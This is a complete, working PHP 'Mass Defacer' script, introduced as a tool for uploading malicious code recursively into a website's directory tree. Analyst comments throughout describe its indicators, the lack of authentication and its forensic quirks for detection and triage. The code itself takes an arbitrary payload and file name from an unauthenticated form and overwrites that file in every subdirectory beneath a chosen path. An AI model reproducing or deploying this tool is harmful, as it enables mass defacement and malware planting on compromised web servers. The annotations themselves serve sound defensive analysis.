With this tool, an attacker can upload malicious code into a website's directory tree (recursively!), under whatever file name they want.
<?php
// ANALYST NOTES (sample annotated for detection and triage; code is unchanged).
// Purpose: a single-file web form that writes one attacker-supplied payload into
// every subdirectory below a chosen base directory, under a chosen file name.
// Indicators visible in this sample:
//   - page title "Mass Defacer by YunusIncredibl"
//   - POST fields: basedir, name, index, go
//   - result: the same file name with identical contents in many directories,
//     all written during a single request
// There is no authentication or access check anywhere in the script: the only
// gate is the presence of the "go" POST field.
// Mitigation hint: every write goes through file_put_contents() as the web
// server user, so it only succeeds where that user has write permission.

// NULL is passed where an int is expected; presumably meant to silence errors
// and lift the execution time limit. The exact effect depends on the PHP
// version -- verify against the host's runtime.
error_reporting (NULL);
set_time_limit (NULL);

// Path separator: "/" by default, "\" when PHP_OS contains "WIN".
$ds = "/";
if (preg_match ("/WIN/", PHP_OS)) $ds = "\\";

// Default base directory offered in the form is the script's working directory.
$dir = getcwd ();
// Global counter of successful writes, incremented inside mass().
$count = 0;

// Render the control form. $dir is concatenated into the HTML without escaping.
// Defaults: name = "index.php"; the payload comes from the "index" textarea.
echo ' <title>Mass Defacer by YunusIncredibl</title> <style>.my{border: solid 1px red}</style> <form method="POST"> Directory : <input class="my" size=40 type="text" name="basedir" value='.$dir.'><br><br> Name : <input class="my" size=40 type="text" name="name" value="index.php"><br><br> Your Index : <br><textarea style="width: 671px; height: 295px;" class="my" name="index"></textarea><br> <input type="submit" value="Start" name="go"> </form>';

// On submit: run the recursive write with the three POST values exactly as
// received (no validation), listing each written path inside a textarea and
// then printing the total count. "@" suppresses the notice when "go" is absent.
if (@$_POST['go']) {
    echo "<textarea style='width: 875px; height: 255px;' class='my'>";
    mass ($_POST['basedir'], $_POST['name'], $_POST['index']);
    echo "</textarea><br>Defaced : $count Folder :D";
}

// mass(): for each entry of $dir that is itself a directory, write $index to
// <dir>/<entry>/<name>, print the path and bump $count on success, then recurse
// into that entry. The base directory itself is not written to -- only its
// descendants. file_put_contents() is called without flags, so an existing
// file with the same name is overwritten.
// Forensic note: success is judged by the truthiness of the byte count, so a
// zero-length payload would not be listed or counted even if a file was
// created -- the printed list may under-report.
function mass ($dir, $name, $index) {
    global $ds;
    global $count;
    foreach (scandir2 ($dir) as $x) {
        if (is_dir ($dir.$ds.$x)) {
            if (file_put_contents ($dir.$ds.$x.$ds.$name, $index)) {
                echo $dir.$ds.$x.$ds.$name."\n";
                $count++;
            }
            mass ($dir.$ds.$x, $name, $index);
        }
    }
}

// scandir2(): returns the entry names of $dir, excluding "." and "..".
// Returns an empty array when $dir does not exist; terminates the whole
// script via die() when the directory cannot be opened.
function scandir2 ($dir) {
    $files = array ();
    if (file_exists ($dir)) {
        $d = opendir ($dir) or die (NULL);
        while ($file = readdir ($d)) {
            if ($file != "." && $file != "..") {
                array_push ($files, $file);
            }
        }
    }
    return $files;
}
?>